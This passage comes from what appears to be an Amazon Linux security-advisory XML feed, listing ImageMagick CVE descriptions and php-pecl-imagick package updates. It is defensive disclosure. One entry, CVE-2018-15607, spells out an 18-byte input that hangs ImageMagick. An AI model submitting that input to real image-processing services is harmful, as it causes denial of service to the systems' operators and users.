coders/mat.c in ImageMagick 7.0.8-43 Q16 allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly have unspecified other impact by crafting a Matlab image file that is mishandled in ReadImage in MagickCore/constitute.c.
CVE-2019-15139:
The XWD image (X Window System window dumping file) parsing component in ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (application crash resulting from an out-of-bounds Read) in ReadXWDImage in coders/xwd.c by crafting a corrupted XWD image file, a different vulnerability than CVE-2019-11472.
CVE-2019-14981:
In ImageMagick 7.x before 7.0.8-41 and 6.x before 6.9.10-41, there is a divide-by-zero vulnerability in the MeanShiftImage function. It allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-14980:
In ImageMagick 7.x before 7.0.8-42 and 6.x before 6.9.10-42, there is a use after free vulnerability in the UnmapBlob function that allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-13454:
ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c.
CVE-2019-13311:
A flaw was found in ImageMagick, containing memory leaks of AcquireMagickMemory due to a wand/mogrify.c error. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
CVE-2019-13310:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to an error found in MagickWand/mogrify.c. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13309:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to the mishandling of the NoSuchImage error in CLIListOperatorImages in MagickWand/operation.c. It was discovered that ImageMagick does not properly release acquired memory in function MogrifyImageList() when some error conditions are met, or the "compare" option is used. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13307:
A heap-based buffer overflow was discovered in ImageMagick in the way it parses images when using the evaluate-sequence option. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13306:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13305:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced strncpy and off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13304:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced assignment. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13301:
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
CVE-2019-13300:
A heap-based buffer overflow was discovered in ImageMagick in the way it applies a value with arithmetic, relational, or logical operators to an image due to mishandling columns. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13297:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood, due to mishandling of a height of zero. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13295:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood, due to mishandling of a width of zero. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13135:
ImageMagick before 7.0.8-50 has a "use of uninitialized value" vulnerability in the function ReadCUTImage in coders/cut.c.
CVE-2019-13134:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c.
CVE-2019-13133:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c.
CVE-2019-12979:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c.
CVE-2019-12978:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c.
CVE-2019-12976:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the ReadPCLImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12975:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the WriteDPXImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12974:
A NULL pointer dereference in the function ReadPANGOImage in coders/pango.c and the function ReadVIDImage in coders/vid.c in ImageMagick 7.0.8-34 allows remote attackers to cause a denial of service via a crafted image.
CVE-2019-11598:
In ImageMagick 7.0.8-40 Q16, there is a heap-based buffer over-read in the function WritePNMImage of coders/pnm.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. This is related to SetGrayscaleImage in MagickCore/quantize.c.
CVE-2019-11597:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file.
CVE-2019-11472:
ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first.
CVE-2019-11470:
The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs because ReadCINImage in coders/cin.c lacks a check for insufficient image data in a file.
CVE-2019-10650:
In ImageMagick 7.0.8-36 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or information disclosure via a crafted image file.
CVE-2019-10131:
An off-by-one read vulnerability was discovered in ImageMagick in the formatIPTCfromBuffer function in coders/meta.c. A local attacker may use this flaw to read beyond the end of the buffer or to crash the program.
CVE-2018-9133:
ImageMagick 7.0.7-26 Q16 has excessive iteration in the DecodeLabImage and EncodeLabImage functions (coders/tiff.c), which results in a hang (tens of minutes) with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted TIFF file.
CVE-2018-8804:
WriteEPTImage in coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote attackers to cause a denial of service (MagickCore/memory.c double free and application crash) or possibly have unspecified other impact via a crafted file.
CVE-2018-20467:
In coders/bmp.c in ImageMagick before 7.0.8-16, an input file can result in an infinite loop and hang, with high CPU and memory consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-18544:
There is a memory leak in the function WriteMSLImage of coders/msl.c in ImageMagick 7.0.8-13 Q16, and the function ProcessMSLScript of coders/msl.c in GraphicsMagick before 1.3.31.
CVE-2018-16750:
In ImageMagick 7.0.7-29 and earlier, a memory leak in the formatIPTCfromBuffer function in coders/meta.c was found.
CVE-2018-16749:
In ImageMagick 7.0.7-29 and earlier, a missing NULL check in ReadOneJNGImage in coders/png.c allows an attacker to cause a denial of service (WriteBlob assertion failure and application exit) via a crafted file.
CVE-2018-16328:
In ImageMagick before 7.0.8-8, a NULL pointer dereference exists in the CheckEventLogging function in MagickCore/log.c.
CVE-2018-15607:
In ImageMagick 7.0.8-11 Q16, a tiny input file 0x50 0x36 0x36 0x36 0x36 0x4c 0x36 0x38 0x36 0x36 0x36 0x36 0x36 0x36 0x1f 0x35 0x50 0x00 can result in a hang of several minutes during which CPU and memory resources are consumed until ultimately an attempted large memory allocation fails. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-14437:
ImageMagick 7.0.8-4 has a memory leak in parse8BIM in coders/meta.c.
CVE-2018-14436:
ImageMagick 7.0.8-4 has a memory leak in ReadMIFFImage in coders/miff.c.
CVE-2018-14435:
ImageMagick 7.0.8-4 has a memory leak in DecodeImage in coders/pcd.c.
CVE-2018-14434:
ImageMagick 7.0.8-4 has a memory leak for a colormap in WriteMPCImage in coders/mpc.c.
CVE-2018-13153:
A memory leak was discovered in ImageMagick in the XMagickCommand function in the animate.c file. An array of strings, named filelist, is allocated on the heap but not released if the function ExpandFilenames returns an error code.
CVE-2018-12600:
In ImageMagick 7.0.8-3 Q16, ReadDIBImage and WriteDIBImage in coders/dib.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-12599:
In ImageMagick 7.0.8-3 Q16, ReadBMPImage and WriteBMPImage in coders/bmp.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-11656:
In ImageMagick 7.0.7-20 Q16 x86_64, a memory leak vulnerability was found in the function ReadDCMImage in coders/dcm.c, which allows attackers to cause a denial of service via a crafted DCM image file.
CVE-2018-10805:
ImageMagick version 7.0.7-28 contains a memory leak in ReadYCBCRImage in coders/ycbcr.c.
CVE-2018-10804:
ImageMagick version 7.0.7-28 contains a memory leak in WriteTIFFImage in coders/tiff.c.
CVE-2018-10177:
An infinite loop has been found in the way ImageMagick reads Multiple-image Network Graphics (MNG) data. An attacker could exploit this to cause a denial of service via a crafted MNG file.
CVE-2017-18273:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadTXTImage in coders/txt.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted image file that is mishandled in a GetImageIndexInList call.
CVE-2017-18271:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadMIFFImage in coders/miff.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted MIFF image file.
CVE-2017-18254:
A memory leak vulnerability has been discovered in ImageMagick in the WriteGIFImage function of the coders/gif.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-18252:
An issue was discovered in ImageMagick 7.0.7. The MogrifyImageList function in MagickWand/mogrify.c allows attackers to cause a denial of service (assertion failure and application exit in ReplaceImageInList) via a crafted file.
CVE-2017-18251:
A memory leak vulnerability has been discovered in ImageMagick in the ReadPCDImage function of the coders/pcd.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-12806:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function format8BIM, which allows attackers to cause a denial of service.
CVE-2017-12805:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function ReadTIFFImage, which allows attackers to cause a denial of service.
CVE-2017-11166:
The ReadXWDImage function in coders/xwd.c in ImageMagick 7.0.5-6 has a memory leak vulnerability that can cause memory exhaustion via a crafted length (number of color-map entries) field in the header of an XWD file.
CVE-2017-1000476:
In ImageMagick 7.0.7-12 Q16, a CPU exhaustion vulnerability was found in the function ReadDDSInfo in coders/dds.c, which allows attackers to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000476" title="" id="CVE-2017-1000476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11166" title="" id="CVE-2017-11166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12805" title="" id="CVE-2017-12805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12806" title="" id="CVE-2017-12806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18251" title="" id="CVE-2017-18251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18252" title="" id="CVE-2017-18252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18254" title="" id="CVE-2017-18254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18271" title="" id="CVE-2017-18271" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18273" title="" id="CVE-2017-18273" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10177" title="" id="CVE-2018-10177" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10804" title="" id="CVE-2018-10804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10805" title="" id="CVE-2018-10805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11656" title="" id="CVE-2018-11656" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12599" title="" id="CVE-2018-12599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12600" title="" id="CVE-2018-12600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13153" title="" id="CVE-2018-13153" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14434" title="" id="CVE-2018-14434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14435" title="" id="CVE-2018-14435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14436" title="" id="CVE-2018-14436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14437" title="" id="CVE-2018-14437" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15607" title="" id="CVE-2018-15607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16328" title="" id="CVE-2018-16328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16749" title="" id="CVE-2018-16749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16750" title="" id="CVE-2018-16750" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18544" title="" id="CVE-2018-18544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20467" title="" id="CVE-2018-20467" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8804" title="" id="CVE-2018-8804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9133" title="" id="CVE-2018-9133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10131" title="" id="CVE-2019-10131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10650" title="" id="CVE-2019-10650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" title="" id="CVE-2019-11470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" title="" id="CVE-2019-11472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" 
title="" id="CVE-2019-11597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" title="" id="CVE-2019-11598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" title="" id="CVE-2019-12974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" title="" id="CVE-2019-12975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" title="" id="CVE-2019-12976" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" title="" id="CVE-2019-12978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" title="" id="CVE-2019-12979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13133" title="" id="CVE-2019-13133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13134" title="" id="CVE-2019-13134" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" title="" id="CVE-2019-13135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" title="" id="CVE-2019-13295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" title="" id="CVE-2019-13297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" title="" id="CVE-2019-13300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" title="" id="CVE-2019-13301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" title="" id="CVE-2019-13304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" title="" id="CVE-2019-13305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" title="" id="CVE-2019-13306" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" title="" id="CVE-2019-13307" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" title="" id="CVE-2019-13309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13310" title="" id="CVE-2019-13310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" title="" id="CVE-2019-13311" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" title="" id="CVE-2019-13454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14980" title="" id="CVE-2019-14980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" title="" id="CVE-2019-14981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" title="" id="CVE-2019-15139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" title="" id="CVE-2019-15140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15141" title="" id="CVE-2019-15141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" title="" id="CVE-2019-16708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16709" title="" id="CVE-2019-16709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" title="" id="CVE-2019-16710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" title="" id="CVE-2019-16711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" title="" id="CVE-2019-16712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" title="" id="CVE-2019-16713" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17540" title="" id="CVE-2019-17540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17541" title="" id="CVE-2019-17541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" title="" id="CVE-2019-19948" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" title="" id="CVE-2019-19949" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" title="" id="CVE-2019-7175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" title="" id="CVE-2019-7397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" title="" id="CVE-2019-7398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9956" title="" id="CVE-2019-9956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php71-pecl-imagick-debuginfo" version="3.4.4" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pecl-imagick-debuginfo-3.4.4-2.8.amzn1.x86_64.rpm</filename></package><package name="php71-pecl-imagick-devel" version="3.4.4" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pecl-imagick-devel-3.4.4-2.8.amzn1.x86_64.rpm</filename></package><package name="php71-pecl-imagick" version="3.4.4" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pecl-imagick-3.4.4-2.8.amzn1.x86_64.rpm</filename></package><package name="php71-pecl-imagick" version="3.4.4" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pecl-imagick-3.4.4-2.8.amzn1.i686.rpm</filename></package><package name="php71-pecl-imagick-debuginfo" version="3.4.4" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pecl-imagick-debuginfo-3.4.4-2.8.amzn1.i686.rpm</filename></package><package 
name="php71-pecl-imagick-devel" version="3.4.4" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pecl-imagick-devel-3.4.4-2.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1815</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1815: medium priority package update for php72-pecl-imagick</title><issued date="2023-08-21 12:14:00" /><updated date="2023-08-23 02:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9956:
In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file.
CVE-2019-7398:
In ImageMagick before 7.0.8-25, a memory leak exists in WriteDIBImage in coders/dib.c.
CVE-2019-7397:
In ImageMagick before 7.0.8-25 and GraphicsMagick through 1.3.31, several memory leaks exist in WritePDFImage in coders/pdf.c.
CVE-2019-7175:
In ImageMagick before 7.0.8-25, some memory leaks exist in DecodeImage in coders/pcd.c.
CVE-2019-19949:
An out-of-bounds read was discovered in ImageMagick when writing PNG images. An attacker may abuse this flaw to trick a victim user into downloading a malicious image file and running it through ImageMagick, causing the application to crash.
CVE-2019-19948:
A heap-based buffer overflow flaw was discovered in ImageMagick when writing SGI images with improper columns and rows properties. An attacker may trick a victim user into downloading a malicious image file and running it through ImageMagick, possibly executing code onto the victim user's system.
CVE-2019-17541:
ImageMagick before 7.0.8-55 has a use-after-free in DestroyStringInfo in MagickCore/string.c because the error manager is mishandled in coders/jpeg.c.
CVE-2019-17540:
ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.
CVE-2019-16713:
ImageMagick 7.0.8-43 has a memory leak in coders/dot.c, as demonstrated by PingImage in MagickCore/constitute.c.
CVE-2019-16712:
ImageMagick 7.0.8-43 has a memory leak in Huffman2DEncodeImage in coders/ps3.c, as demonstrated by WritePS3Image.
CVE-2019-16711:
ImageMagick 7.0.8-40 has a memory leak in Huffman2DEncodeImage in coders/ps2.c.
CVE-2019-16710:
ImageMagick 7.0.8-35 has a memory leak in coders/dot.c, as demonstrated by AcquireMagickMemory in MagickCore/memory.c.
CVE-2019-16709:
ImageMagick 7.0.8-35 has a memory leak in coders/dps.c, as demonstrated by XCreateImage.
CVE-2019-16708:
ImageMagick 7.0.8-35 has a memory leak in magick/xwindow.c, related to XCreateImage.
CVE-2019-15141:
WriteTIFFImage in coders/tiff.c in ImageMagick 7.0.8-43 Q16 allows attackers to cause a denial-of-service (application crash resulting from a heap-based buffer over-read) via a crafted TIFF image file, related to TIFFRewriteDirectory, TIFFWriteDirectory, TIFFWriteDirectorySec, and TIFFWriteDirectoryTagColormap in tif_dirwrite.c of LibTIFF. NOTE: this occurs because of an incomplete fix for CVE-2019-11597.
CVE-2019-15140:
coders/mat.c in ImageMagick 7.0.8-43 Q16 allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly have unspecified other impact by crafting a Matlab image file that is mishandled in ReadImage in MagickCore/constitute.c.
CVE-2019-15139:
The XWD image (X Window System window dumping file) parsing component in ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (application crash resulting from an out-of-bounds Read) in ReadXWDImage in coders/xwd.c by crafting a corrupted XWD image file, a different vulnerability than CVE-2019-11472.
CVE-2019-14981:
In ImageMagick 7.x before 7.0.8-41 and 6.x before 6.9.10-41, there is a divide-by-zero vulnerability in the MeanShiftImage function. It allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-14980:
In ImageMagick 7.x before 7.0.8-42 and 6.x before 6.9.10-42, there is a use after free vulnerability in the UnmapBlob function that allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-13454:
ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c.
CVE-2019-13311:
A flaw was found in ImageMagick, containing memory leaks of AcquireMagickMemory due to a wand/mogrify.c error. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
CVE-2019-13310:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to an error found in MagickWand/mogrify.c. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13309:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to the mishandling of the NoSuchImage error in CLIListOperatorImages in MagickWand/operation.c. It was discovered that ImageMagick does not properly release acquired memory in function MogrifyImageList() when some error conditions are met, or the "compare" option is used. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13307:
A heap-based buffer overflow was discovered in ImageMagick in the way it parses images when using the evaluate-sequence option. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13306:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13305:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced strncpy and off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13304:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced assignment. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13301:
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
CVE-2019-13300:
A heap-based buffer overflow was discovered in ImageMagick in the way it applies a value with arithmetic, relational, or logical operators to an image due to mishandling columns. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13297:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a height of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13295:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a width of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13135:
ImageMagick before 7.0.8-50 has a "use of uninitialized value" vulnerability in the function ReadCUTImage in coders/cut.c.
CVE-2019-13134:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c.
CVE-2019-13133:
